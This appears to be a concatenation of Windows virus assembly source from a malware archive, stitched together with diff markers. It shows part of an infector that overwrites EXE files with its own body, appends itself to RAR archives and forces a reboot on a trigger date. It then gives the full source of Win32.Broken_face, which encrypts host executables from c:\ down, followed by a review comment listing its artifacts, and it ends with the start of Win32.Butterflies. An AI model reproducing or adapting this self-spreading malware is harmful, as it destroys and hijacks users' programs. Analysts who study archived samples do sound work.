db 08ch,07ch,081h,09ah,02ah,086h,05bh,029h,0f5h,01dh,08ch,07ch,081h,036h,038h
db 086h,0feh,02ch,0f5h,01dh,0d1h,05dh,0c6h,0d4h,094h,03eh,03eh,0d4h,045h,03dh
db 03fh,088h,006h,0f1h,019h,012h,0fdh,00ah,096h,02eh,087h,0dfh,02ch,0b7h,0efh
db 085h,0b8h,03ch,094h,000h,016h,048h,03bh,096h,0dah,0c4h,092h,032h,027h,0fbh
db 03dh,07fh,077h,0fbh,07dh,03eh,075h,03ch,08ch,000h,081h,01ch,038h,0f1h,019h
db 04fh,03bh,0d5h,00ah,0c2h,0abh,06eh,085h,033h,03bh,0d4h,017h,03fh,081h,09ah
db 02ah,088h,078h,086h,05bh,029h,0f5h,01dh,08ch,002h,0f5h,01dh,062h,06eh,080h
db 03eh,005h,0a0h,016h,0c3h,026h,02fh,034h,0afh,0d0h,06dh,03ah,088h,006h,0f1h
db 019h,066h,080h,03dh,07bh,085h,01bh,03ch,0a4h,012h,0c7h,022h,02bh,030h,0d1h
db 0c5h,0c5h,072h,071h,074h,071h,070h,018h,07dh,06bh,06fh,07dh,071h,07ah,070h
db 07dh,06eh,018h,071h,079h,075h,06dh,06fh,019h,001h,06bh,05dh,04ch,03fh,0d1h
db 0ebh,0c5h,0d4h,05fh,03eh,087h,050h,02ah,085h,03ch,03ch,0d0h,003h,039h,081h
db 037h,03fh,0d0h,0f2h,03ah,084h,03ah,07eh,0a1h,00fh,0f1h,0f1h,019h,082h,05bh
db 029h,081h,09ah,02ah,0d4h,07ch,038h,0b1h,02ah,066h,02eh,09bh,060h,02ah,082h
db 076h,02eh,081h,01ah,038h,0d4h,00ch,038h,09bh,070h,02ah,088h,078h,086h,074h
db 02eh,081h,014h,038h,0f1h,019h,0fbh,03eh,070h,02ah,03ch,038h,0fbh,03eh,060h
db 02ah,03ch,038h,0fbh,03eh,062h,02ah,03ch,038h,086h,05bh,029h,081h,09ah,02ah
db 088h,078h,0f1h,019h,0d5h,04ah,0c1h,0d0h,034h,03ah,083h,0aeh,02eh,081h,038h
db 038h,0d4h,0d8h,03ch,085h,033h,03bh,0d4h,057h,03eh,080h,03eh,07ah,00fh,0f1h
db 0a5h,0f5h,01dh,0bfh,0f6h,0b3h,0ech,0bbh,0d6h,03ch,0bfh,0e1h,03dh,0bbh,0fdh
db 039h,084h,038h,07eh,0f5h,01dh,086h,05fh,02dh,085h,09eh,02eh,0d0h,0efh,03bh
db 09fh,0b4h,02eh,0b1h,02ah,0b6h,02eh,08ch,07ch,081h,01eh,038h,086h,04ch,02eh
db 0f5h,01dh,081h,014h,038h,082h,040h,02eh,0d0h,085h,03bh,09fh,098h,02eh,0b1h
db 02ah,09ah,02eh,08ch,07ch,081h,02ch,038h,086h,0aeh,02eh,0f5h,01dh,0ffh,03ah
db 0b4h,02eh,038h,03ch,0ffh,03ah,0b6h,02eh,038h,03ch,0ffh,03ah,098h,02eh,038h
db 03ch,0ffh,03ah,09ah,02eh,038h,03ch,08ch,07ch,081h,09ah,02ah,086h,05bh,029h
db 0f5h,01dh,0ffh,03ah,04eh,02eh,038h,03ch,08ch,07ch,081h,038h,038h,086h,04ch
db 02eh,0f5h,01dh,0d1h,0e1h,0c4h,012h,0fch,002h,08ah,02eh,016h,0b6h,036h,094h
db 02ah,01ah,0b0h,071h,03ch,0ffh,005h,071h,062h,049h,03bh,0d5h,0d7h,0c7h,005h
db 066h,075h,049h,03bh,0d5h,0dfh,0c7h,0b8h,002h,02ah,030h,07bh,049h,03bh,0d5h
db 046h,0c7h,004h,0bch,04dh,03fh,0d1h,0a0h,0c5h,07ch,04dh,03fh,0d1h,0f0h,0c4h
db 0bch,006h,02eh,034h,07eh,04dh,03fh,0d1h,000h,0c6h,0bch,006h,02eh,034h,07dh
db 04dh,03fh,0d1h,01dh,0c7h,0bch,006h,02eh,034h,06eh,04dh,03fh,0d1h,08ch,0c6h
db 0d5h,0b4h,0c0h,069h,085h,021h,03ch,0d0h,021h,039h,039h,078h,03ch,092h,065h
db 0dah,0ceh,0fbh,035h,038h,031h,032h,01ch,063h,077h,06dh,07dh,06ah,07dh,070h
db 065h,018h,00dh,016h,00dh,018h,05eh,041h,01ch,071h,052h,04ch,00dh,00bh,054h
db 017h,075h,073h,064h,065h,01ch,015h,01ch,06fh,04eh,051h,048h,04ch,059h,056h
db 01ch,051h,052h,018h,06ch,059h,04eh,059h,05bh,04dh,05dh,041h,01ch,015h,01ch
db 068h,050h,05dh,05dh,04bh,059h,018h,04eh,05dh,05bh,051h,04fh,04ch,059h,04ah
db 01dh,018h,031h,032h,018h,07ch,073h,06bh,01ch,071h,052h,05eh,059h,05bh,048h
db 051h,053h,056h,01ch,075h,05dh,05bh,054h,051h,052h,05dh,03eh,061h,0d5h,087h
db 033h,018h,070h,05dh,05dh,04ah,052h,018h,04fh,057h,051h,05dh,01ch,05fh,049h
db 059h,04eh,059h,052h,099h,01ch,04fh,053h,04ah,058h,04bh,01dh,002h,077h,04dh
db 05dh,04ah,05dh,050h,045h,005h,06fh,04dh,052h,018h,01ch,079h,098h,098h,001h
db 07ch,059h,04eh,055h,054h,01ch,018h,077h,04dh,098h,098h,001h,06fh,053h,055h
db 05dh,056h,01ch,086h,074h,037h,059h,040h,059h,05bh,053h,055h,04fh,041h,04fh
db 057h,05eh,052h,05eh,059h,048h,057h,04ah,054h,05dh,04ah,056h,04ah,05dh,04ah
db 06eh,035h,07dh,022h,03ch,016h,0c3h,03eh,06eh,033h,084h,039h,06bh,081h,00bh
db 046h,0bch,0d9h,0dch,0b8h,0f5h,026h,086h,0b9h,019h,0a4h,012h,0c7h,022h,02bh
db 030h,0fbh,01ch,07dh,011h,055h,05dh,051h,050h,018h,051h,05dh,006h,018h,075h
db 056h,048h,009h,00fh,050h,07ch,059h,052h,04ch,055h,04bh,053h,05bh,055h,059h
db 050h,016h,05fh,057h,051h,018h,084h,038h,07eh,0d3h,03fh,080h,03eh,07ah,00fh
db 0f1h,0a5h,0f5h,01dh,0fbh,032h,036h,023h,03fh,0ffh,06ah,06bh,0ddh,07ch,082h
db 056h,038h,0cbh,0dah,039h,03bh,039h,087h,087h,02fh,0bfh,0eah,03ch,0cfh,0cbh
db 0b3h,0feh,0cfh,0ddh,0cfh,0cbh,067h,066h,078h,0ffh,016h,0bch,006h,096h,038h
db 06fh,04dh,074h,016h,0c2h,03eh,097h,038h,012h,0b8h,002h,093h,03ch,030h,04ah
db 003h,022h,068h,06fh,00bh,0fch,0b6h,0e4h,099h,0b8h,038h,0b7h,026h,0bah,038h
db 012h,09bh,0e7h,03ch,012h,0b1h,022h,0e5h,038h,016h,09fh,02bh,030h,016h,0b5h
db 026h,029h,034h,0c6h,0ffh,03ah,0bch,03ch,0a9h,038h,0b4h,032h,0beh,03ch,0c3h
db 012h,0feh,03ah,093h,03ch,038h,012h,0feh,03ah,092h,03ch,076h,067h,060h,023h
db 0d1h,0ffh,0cch,0d4h,0bfh,0c3h,0b1h,012h,039h,03eh,0b9h,0d1h,0fah,03dh,0b1h
db 012h,007h,03ch,0dch,07ch,0beh,0dch,0dch,07ch,09bh,035h,03ah,00fh,0ceh,083h
db 05bh,029h,081h,007h,014h,0cfh,09ch,082h,04ah,02bh,099h,035h,03ah,085h,073h
db 034h,009h,038h,07eh,07ah,0dah,0c6h,0dch,07ch,0beh,0dch,0dch,07ch,09bh,07bh
db 038h,085h,014h,03dh,0d0h,073h,0c7h,083h,07dh,03ch,005h,058h,038h,04bh,037h
db 08dh,039h,084h,0b9h,008h,093h,083h,081h,031h,080h,00dh,03ch,097h,0d3h,01dh
db 005h,0f4h,038h,04bh,037h,08dh,03ah,084h,0b9h,010h,093h,083h,081h,031h,080h
db 03dh,03ch,097h,0d3h,031h,089h,03fh,080h,0bdh,03ch,097h,087h,085h,035h,084h
db 011h,038h,093h,00eh,0d5h,083h,006h,03ch,069h,085h,0c7h,03ch,0d0h,037h,0c7h
db 065h,004h,06ch,04fh,029h,088h,087h,092h,083h,071h,03ch,080h,07fh,07bh,097h
db 087h,07ah,038h,082h,05ah,02ch,03bh,0cdh,09ch,0d7h,014h,000h,098h,04bh,02dh
db 08ch,086h,096h,087h,075h,038h,084h,07eh,07ah,093h,083h,07eh,03ch,086h,059h
db 028h,03fh,0c9h,098h,0d3h,02fh,088h,083h,092h,083h,071h,03ch,080h,07bh,07fh
db 097h,087h,07ah,038h,082h,050h,02ch,03bh,0cdh,09ch,00fh,0ceh,083h,05bh,029h
db 081h,071h,038h,0cfh,09ch,082h,05bh,029h,0b9h,0fah,075h,03ch,099h,07bh,038h
db 085h,0e0h,03ch,009h,038h,07eh,07ah,0dah,0c6h,016h,0bch,006h,02eh,034h,05eh
db 04dh,037h,086h,05fh,02dh,0bdh,0feh,003h,038h,0fbh,03ch,071h,044h,0ffh,086h
db 08ah,02ch,0bdh,034h,01ch,018h,0bfh,074h,03eh,018h,083h,0c2h,037h,086h,08ah
db 02ch,0bdh,0c7h,02eh,034h,04bh,00fh,085h,03bh,03ch,0cbh,09ah,04dh,0cch,0b9h
db 0c3h,0c5h,037h,04ch,00dh,0b9h,0c3h,038h,030h,04ch,013h,0b9h,0c3h,03bh,030h
db 04ch,011h,0b9h,0c3h,03eh,030h,04ch,017h,0b9h,0c3h,031h,030h,04ch,015h,0b9h
db 0c3h,034h,030h,04ch,01bh,0b9h,0c3h,037h,030h,04ch,019h,0b9h,0c3h,02ah,030h
db 04ch,01fh,0feh,03ah,02ah,030h,060h,0c5h,0fbh,08ch,07dh,0d7h,022h,08ch,07bh
db 0d7h,02eh,08ch,06bh,0d7h,02ah,08ch,077h,0d7h,036h,08ch,07ah,0d7h,032h,08ch
db 07dh,0d7h,03eh,08ch,079h,0d7h,03ah,08ch,06ah,09eh,02ah,030h,0b6h,0e7h,0c0h
db 0ffh,08ch,003h,081h,03fh,038h,086h,07ah,02eh,0f5h,01dh,0b3h,02ah,07bh,02eh
db 098h,07eh,02ah,0ffh,06bh,06dh,06eh,06bh,0d0h,009h,038h,086h,0c7h,0c3h,080h
db 0c3h,0c7h,017h,0e3h,0b6h,024h,07ah,00ah,0e4h,0e9h,0dfh,0e9h,0dfh,0b2h,0f8h
db 0b2h,0deh,0b2h,0eah,00ah,0cah,00bh,0bbh,003h,014h,00bh,0abh,005h,014h,071h
db 049h,0dah,0bfh,0cah,0c3h,00dh,0c3h,0c7h,063h,066h,065h,063h,0ffh,080h,0f1h
db 02bh,0b0h,0f3h,0f3h,068h,06dh,06ah,06bh,087h,007h,010h,00fh,0f1h,00fh,0eah
db 00fh,0f8h,0b6h,0f9h,06dh,081h,034h,038h,0c4h,0e9h,0e6h,0e9h,0e4h,04bh,03bh
db 0b9h,0ceh,080h,0d1h,00dh,01ch,0bbh,0deh,0c8h,0b5h,03dh,0b5h,06dh,03eh,0bbh
db 0fbh,03ch,065h,079h,0bdh,0c1h,03ch,039h,049h,0eeh,063h,062h,065h,060h,0ffh
db 026h,06ah,068h,06fh,0a4h,064h,0b8h,0d8h,0c6h,06ch,0a5h,017h,0f8h,0b2h,0e0h
db 087h,03ch,03ch,0fdh,00bh,0feh,038h,0f7h,067h,060h,062h,027h,0ffh,0a4h,012h
db 0c7h,022h,0a4h,03dh,04bh,03fh,0d1h,0abh,038h,01ah,0b9h,083h,073h,03ch,0dah
db 0cbh,04dh,03fh,0d1h,09fh,0cah,01ah,0b9h,043h,02bh,07ch,033h,048h,03bh,0d5h
db 0b8h,03ch,0a4h,06ch,06bh,06dh,06ah,06ah,06fh,012h,0feh,03ah,091h,03ch,07eh
db 03ah,026h,03ah,027h,032h,03fh,0b1h,04fh,03fh,087h,03fh,038h,085h,003h,03ch
db 0cbh,098h,027h,03bh,0d0h,04fh,038h,084h,039h,03fh,013h,0eeh,081h,03dh,068h
db 0a0h,016h,0c3h,026h,0a0h,039h,084h,039h,03fh,0a4h,012h,0c7h,022h,0a4h,03dh
db 03eh,032h,03fh,012h,0feh,03ah,02ah,030h,05ah,069h,026h,03ah,085h,033h,03ah
db 0d4h,043h,0c1h,03fh,023h,065h,084h,031h,03fh,081h,03eh,068h,087h,05bh,02bh
db 0a4h,012h,0c7h,022h,0a4h,03dh,080h,035h,03bh,0a0h,016h,0c3h,026h,0a0h,039h
db 084h,039h,03fh,081h,03dh,038h,00fh,0eah,087h,05bh,029h,0a4h,012h,0c7h,022h
db 0a4h,03dh,03fh,063h,066h,066h,061h,067h,060h,0a1h,0f2h,03eh,038h,03fh,06ah
db 053h,050h,05dh,051h,054h,09bh,01ch,068h,05dh,04ah,05dh,05fh,049h,059h,045h
db 019h,03fh,026h,03ah,06bh,032h,036h,023h,03fh,00fh,0f8h,0b2h,0e0h,082h,040h
db 03ch,087h,033h,010h,099h,09dh,0b2h,0f8h,083h,040h,03ch,080h,050h,028h,097h
db 0b4h,0f4h,093h,032h,036h,023h,03fh,083h,02bh,014h,081h,03dh,03ah,084h,068h
db 03ch,093h,0b7h,0f9h,097h,0c6h,0fdh,0b9h,0c5h,032h,03eh,04eh,0cdh,00bh,0fch
db 0f5h,02fh,080h,036h,03dh,087h,02bh,014h,081h,03dh,068h,00fh,0eah,0f1h,02bh
db 00fh,0f8h,0b2h,0f8h,082h,037h,014h,087h,044h,038h,099h,09dh,067h,03fh,023h
db 0fbh,06ch,06bh,06dh,06ah,06ah,06fh,069h,026h,03ah,036h,032h,027h,03bh,01eh
db 0bch,006h,089h,033h,072h,04dh,02ah,080h,03dh,03ah,087h,08eh,02eh,081h,03dh
db 038h,086h,0b8h,03ch,0f5h,02fh,0b9h,083h,073h,03ch,0dah,0cbh,04dh,036h,03fh
db 023h,065h,063h,066h,066h,061h,067h,060h,0f3h,01eh,0fah,03eh,095h,038h,074h
db 01eh,0fah,03eh,089h,033h,065h,087h,01ch,038h,0d4h,085h,0cch,0d3h,0deh,082h
db 0ceh,039h,085h,03eh,03ch,056h,07eh,0dah,0c0h,0d4h,094h,030h,048h,0c3h,0b7h
db 0cbh,085h,038h,03dh,082h,0cch,039h,0cfh,057h,0ffh,00fh,013h,03fh,008h,014h
db 038h,00dh,011h,03dh,0e3h,03ah,019h,03ah,02eh,023h,0c3h,054h,03eh,037h,034h
db 039h,03dh,038h,03ch,098h,00ch,079h,072h,06ch,075h,015h,06ah,071h,06eh,016h
db 078h,079h,068h,038h,07fh,070h,077h,074h,075h,06bh,068h,016h,071h,06bh,03ch
db 07bh,074h,073h,070h,071h,06fh,06ch,012h,07bh,06ch,06bh,03ch,079h,06ah,068h
db 012h,07bh,06eh,07bh,03ch,038h,03ch,0b8h,03ch,038h,03ch,064h,03ch,038h,03ch
db 054h,03ch,038h,03ch,07bh,006h,064h,07fh,077h,071h,075h,07dh,076h,078h,016h
db 07fh,077h,071h,038h,0b6h,03fh,03ch,0f9h,02ch,039h,03dh,038h,03dh,0a3h,09ch
db 091h,02eh,039h,03ch,039h,03ch,038h,004h,044h,0fah,0feh,050h,0c6h,0fah,0feh
db 0fah,07ch,03ch,038h,03ch,038h,0c4h,044h,05ah,05eh,052h,0c4h,05ah,05eh,042h
db 0c4h,03ch,038h,03ch,038h,004h,044h,0dah,05eh,05eh,058h,05eh,0deh,042h,004h
db 03ch,038h,03ch,038h,0cch,000h,020h,076h,0dah,05eh,05ah,05eh,040h,0c0h,03ch
db 038h,03ch,038h,044h,0c4h,05ah,052h,0c4h,050h,05eh,05eh,0c0h,040h,03ch,038h
db 03ch,038h,040h,0c6h,05eh,058h,054h,0c0h,054h,058h,05ch,0c8h,03ch,038h,03ch
db 038h,040h,0d6h,05ah,05ch,05ch,0dah,05ah,056h,0c2h,04eh,03eh,038h,03ch,038h
db 07eh,05eh,05ah,05eh,0dbh,046h,05ah,05eh,05ah,07ah,03ch,038h,03ch,038h,024h
db 004h,000h,020h,024h,020h,024h,004h,000h,020h,03ch,038h,03ch,038h,03ah,036h
db 032h,07eh,05ah,04eh,05ah,05eh,05ah,004h,03ch,038h,03ch,038h,01eh,05eh,0dah
db 05eh,048h,040h,050h,0deh,05ah,01ah,03ch,038h,03ch,038h,01ch,058h,0dch,058h
db 05ch,05ah,05ah,056h,05ah,0c4h,03ch,038h,03ch,038h,0beh,0fah,0fah,0d6h,0c2h
db 0eeh,0eah,0feh,0fah,07ch,03ch,038h,03ch,038h,0beh,0feh,0dah,0ceh,0e2h,0f6h
db 0fah,0feh,0fah,07ah,03ch,038h,03ch,038h,024h,004h,052h,05eh,05ah,05eh,05ah
db 04eh,000h,020h,03ch,038h,03ch,038h,0cch,044h,052h,05eh,05ah,056h,0c0h,058h
db 05ch,078h,03ch,038h,03ch,038h,00ch,044h,0fah,0feh,0fah,0feh,0fah,0eeh,040h
db 020h,030h,038h,03ch,038h,0c0h,05eh,05ah,05eh,048h,040h,050h,0deh,05ah,01ah
db 03ch,038h,03ch,038h,000h,05eh,05ah,05eh,00eh,020h,030h,01eh,05ah,084h,03ch
db 038h,03ch,038h,018h,046h,0e7h,0a1h,024h,020h,024h,020h,024h,004h,03ch,038h
db 03ch,038h,07eh,05eh,05ah,05eh,05ah,05eh,05ah,05eh,042h,004h,03ch,038h,03ch
db 038h,018h,05eh,05ah,05eh,05ah,05eh,05ah,05eh,000h,020h,03ch,038h,03ch,038h
db 0beh,0feh,0fah,0feh,0eah,0eeh,0c2h,0c6h,0d2h,07ch,03ch,038h,03ch,038h,07eh
db 05eh,000h,020h,024h,020h,024h,004h,05ah,07ah,03ch,038h,03ch,038h,07eh,05eh
db 05ah,004h,024h,020h,024h,020h,024h,004h,03ch,038h,03ch,038h,000h,05eh,07ah
db 034h,024h,044h,00ch,05ah,05ah,004h,03ch,038h,0b6h,03fh,03ch,039h,056h,0c9h
db 01ch,017h,07fh,018h,03ch,038h,048h,038h,0bch,010h,03ch,09eh,02eh,038h,03ch
db 09eh,02eh,038h,03ch,038h,03ch,038h,03ch,038h,0e2h,07dh,01eh,01dh,028h,008h
db 034h,038h,03ch,038h,03ch,038h,079h,077h,072h,071h,012h,07bh,073h,075h,05ch
db 0d2h,03ch,038h,022h,03fh,03dh,038h,02ch,038h,03ch,062h,0e2h,07dh,0bdh,01dh
db 09ah,02ah,03ch,038h,09ah,02ah,03ch,038h,03ch,038h,03ch,038h,03ch,038h,03ch
db 038h,03ch,038h,06dh,07eh,073h,073h,012h,07bh,073h,075h,03ch,038h,03ch,038h
db 03ch,038h,03ch,000h
.CODE
BORGES: push offset SystemTimeStruc
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
mov dword ptr [Posicion],esi
add edi,4
mov byte ptr [edi],00
Carrousell:
jmp InfectEXEs
Volver: push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectEXEs:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle1],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
jmp InfectRARs
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle1]
call FindNextFileA
jmp Ciclo
InfectRARs:
push offset Win32FindData
push offset Victimas2
call FindFirstFileA
mov dword ptr [SearcHandle2],eax
Ciclear:cmp eax,-1
je Salida
or eax,eax
jnz Follow
jmp Volver
Follow: push 00
push 00000080h
push 03
push 00
push 00
push 0c0000000h
push offset Hallado ; Abrir el RAR
call CreateFileA
mov dword ptr [FileHandle],eax
push 02
push 00
push 00 ; Puntero al final
push eax
call SetFilePointer
mov edi,offset RARName
mov ecx,7 ; Get a random name
call Changer
mov esi,offset Kuarahy2
mov edi,Size ; Get CRC
call CRC32
mov dword ptr [RARCrc32],eax
mov esi,offset RARHeader+2
mov edi,HeaderSize-2 ; CRC of the header
call CRC32
mov word ptr [RARHeaderCRC],ax
push 0
push offset Number
push HeaderSize
push offset RARHeader ; Write header
push dword ptr [FileHandle]
call WriteFile
mov word ptr [RARHeaderCRC],0
mov word ptr [RARCrc32],0 ; Blank
mov word ptr [RARCrc32+2],0
push 0
push offset Number
push Size
push offset Kuarahy2 ; Drop viruz
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle]
call CloseHandle
push offset Win32FindData
push dword ptr [SearcHandle2]
call FindNextFileA
jmp Ciclear
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
push dword ptr [MemHandle]
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov esi,dword ptr [Posicion]
mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
Out: push 0
call ExitProcess
CRC32: cld ; Routine extracted from Vecna's
push ebx ; Inca virus. Muito brigado!
mov ecx,-1
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
Changer: mov ebx,25
call GetTickCount ; ¥embo random
mov edx,dword ptr offset [SystemTimeStruc+6]
xor eax,edx
xor edx,edx
div ebx
xchg eax,edx
add eax,65
stosb
loop Changer
ret
Ends
End BORGES
; Brought to you by 'The ZOO' !
+342
@@ -0,0 +1,342 @@
; ___________________
; | Win32.Broken_face |
; | __________________|
; ___________||
;[ Information ]
;First, virus moves to the root directory, and scans for
;directorys.It enters them and checks for executables.If
;no files found or more files needed, then looks in the
;current directory for another subdir. If there isnt any
;it goes back and enters another dir etc etc. Encrypts
;hostfiles ( marked with _ in front of their name ) and
;when its time to execute a host, it decrypts it into a
;file marked with $, executes it, and keeps deleting it
;until the file exits so the decrypted file dissapears.
;Sick method, could not think of anything else, but it
;works fine. Infected hosts keep the original size if
;they are smaller than 8192 bytes.Thats all. Be carefull
;if you think of experimenting with it,spreads faaassst.
.386
.model flat
.data
fuck dd 0
shit dd 0
ftel dd ?
tdata db 318 dup (?)
target dd ?
Nbytes dd 0
newhandle dd ?
depth db 0
filehandle db 40 dup (?)
find_data db 3180 dup (?)
xdata db 318 dup (?)
files2eat db 0eh
xhandle dd 0
msg db "There was this boy",0dh,"who had two chlidren",0dh
db "with his sisters",0dh,"They were his daughters",0dh
db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
db 0dh,"Where there were eyes there's only space",0dh
db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
.code
extrn ExitProcess:proc
extrn MessageBoxA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetCurrentDirectoryA:proc
extrn DeleteFileA:proc
extrn FindClose:proc
extrn CreateFileA:proc
extrn GetCurrentDirectoryA:proc
extrn ReadFile:proc
extrn WriteFile:proc
extrn CloseHandle:proc
extrn WinExec:proc
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
start:
sub esp,1024
mov ebp,esp
call GetCommandLineA
inc eax
mov [ftel],eax
laos:
cmp byte ptr [eax],'"'
je monday
inc eax
jmp laos
monday:
mov byte ptr [eax],0
mov dword ptr [fuck],eax
push offset root
call SetCurrentDirectoryA
xor esi,esi ;for find_data
xor edi,edi ;for filehandle
find1stdir:
lea eax,[find_data+esi]
push eax
push offset dirmasker
call FindFirstFileA
mov dword ptr [filehandle+edi],eax
cmp dword ptr [find_data+esi],10h ;check if it is a dir
jne find2nddir
cmp byte ptr [find_data+esi+44],"."
je find2nddir
getin:
lea eax,[find_data+44+esi]
push eax
call SetCurrentDirectoryA
inc byte ptr [depth]
push offset xdata
push offset exefile
call FindFirstFileA
cmp eax,-1
jnz fne1
dam:
add edi,4
add esi,313
jmp find1stdir
fne1:
mov bh,byte ptr [xdata+43]
mov [xhandle],eax
jmp infect
fne2:
mov byte ptr [xdata+43],bh
push offset xdata
mov eax,[xhandle]
push eax
call FindNextFileA
or eax,eax
jz dam
infect:
cmp byte ptr [xdata+44],'_'
je fne2
mov bh,byte ptr [xdata+43]
mov byte ptr [xdata+43],'_'
push offset tdata
push offset xdata+43
call FindFirstFileA
cmp eax,-1
jnz fne2
dmf:
xor edx,edx
push edx
push 2
push 1
push edx
push edx
push 40000000h
push offset xdata+43
call CreateFileA
cmp eax,-1
je end ; failed. back in the box :(
mov [newhandle],eax
xor edx,edx
push edx
push edx
push 3
push edx
push edx
push 80000000h
push offset xdata+44
call CreateFileA
mov [target],eax
mov byte ptr [shit],66
call copyfile
call ftopen
xor edx,edx
push edx
push 80
push 3
push edx
push edx
push 40000000h
push offset xdata+44
call CreateFileA
mov [newhandle], eax
call copyfile
jmp end
getback:
cmp byte ptr [depth],0
je realend
dec byte ptr [depth]
push dword ptr [edi+filehandle]
call FindClose
sub esi,313
sub edi,4
push offset cdback
call SetCurrentDirectoryA
jmp find2nddir
goroot:
xor esi,esi
mov edi,esi
mov byte ptr [depth],0
push offset root
call SetCurrentDirectoryA ;move to c:\
find2nddir:
lea eax,[find_data+esi]
push eax
push dword ptr [filehandle+edi]
call FindNextFileA
or eax,eax
jz getback
cmp dword ptr [find_data+esi],10h
jne find2nddir
cmp byte ptr [find_data+esi+44],'.'
je find2nddir
jmp getin
end:
dec byte ptr [files2eat]
cmp byte ptr [files2eat],0
jne fne2
realend:
call dencrypt
push 5
push dword ptr [ftel]
call WinExec
cmp eax,31
jg fuckup
push 0
push offset tag+1
push offset msg
push 0
call MessageBoxA
jmp deadend
fuckup:
push dword ptr [ftel]
call DeleteFileA
or eax,eax
jz fuckup
deadend:
push 0
call ExitProcess
exefile db '*.exe',0
dirmasker db '*.',0
root db 'c:\',0
cdback db '..',0
tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
copyfile:
push 0
push offset Nbytes
push 1024
push ebp
mov eax,[target]
push eax
call ReadFile
mov eax,[Nbytes]
or eax,eax
jz gbgb
cmp byte ptr [shit],66
je enchost
bck:
push 0
push offset Nbytes
push [Nbytes]
push ebp
mov eax,[newhandle]
push eax
call WriteFile
jmp copyfile
gbgb:
push dword ptr [newhandle]
call CloseHandle
push dword ptr [target]
call CloseHandle
mov byte ptr [shit],0
ret
enchost:
push esi
mov esi,ebp
mov ecx,100h
xor bx,bx
ench:
add bx,cx
xor word ptr [esi],bx
inc esi
inc esi
loop ench
pop esi
mov byte ptr [shit],66
jmp bck
dencrypt:
mov esi,dword ptr [fuck]
Tuesday:
cmp byte ptr [esi],'\'
je google
dec esi
loop Tuesday
google:
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],'_'
Friday:
inc esi
mov bl,byte ptr [esi]
mov byte ptr [esi],al
cmp byte ptr [esi],0
jz Sunday
inc esi
mov al,byte ptr [esi]
mov byte ptr [esi],bl
cmp byte ptr [esi],0
jnz Friday
Sunday:
call ftopen
mov esi, dword ptr [ftel]
ghho:
inc esi
cmp byte ptr [esi],'_'
jne ghho
mov byte ptr [esi],'$'
xor edx,edx
push edx
push 2
push 1
push edx
push 1
push 40000000h
push dword ptr [ftel]
call CreateFileA
mov [newhandle], eax
mov byte ptr [shit],66
call copyfile
ret
ftopen:
xor edx,edx
push edx
push edx
push 3
push edx
push 1
push 80000000h
push dword ptr [ftel]
call CreateFileA
mov [target],eax
ret
end start
;2-9-2004
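Review bot: The `;[ Information ]` header at the top of this file describes the directory walk but never names the on-disk artifacts the code leaves, which is the first thing an analyst triaging this archive needs. From the code itself: the host is XOR-encrypted (the `enchost` loop in `copyfile`) into a copy whose name carries a leading `_` (`xdata+43`), the original name is then overwritten with the body read from the command-line path (`ftel`), and at run time `dencrypt` writes a decrypted copy under a leading `$`, launches it with `WinExec`, and loops on `DeleteFileA` until it is gone; the only fixed string marker is `[Broken_face` at the `tag` label. I would add to the header: `; Artifacts: '_'-prefixed XOR-encrypted hosts, '$'-prefixed transient decrypted copies, '[Broken_face' tag string, scan rooted at c:\ with mask '*.'`.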
+250
@@ -0,0 +1,250 @@
;Win32.Butterflies By Twizter/NuKe
.386p
.model flat ;Setting para el Tasm
.code
;=============================
extrn GetSystemDirectoryA:proc
extrn GetWindowsDirectoryA:proc
extrn lstrcat:proc
extrn ExitProcess:proc
extrn GetModuleHandleA:proc
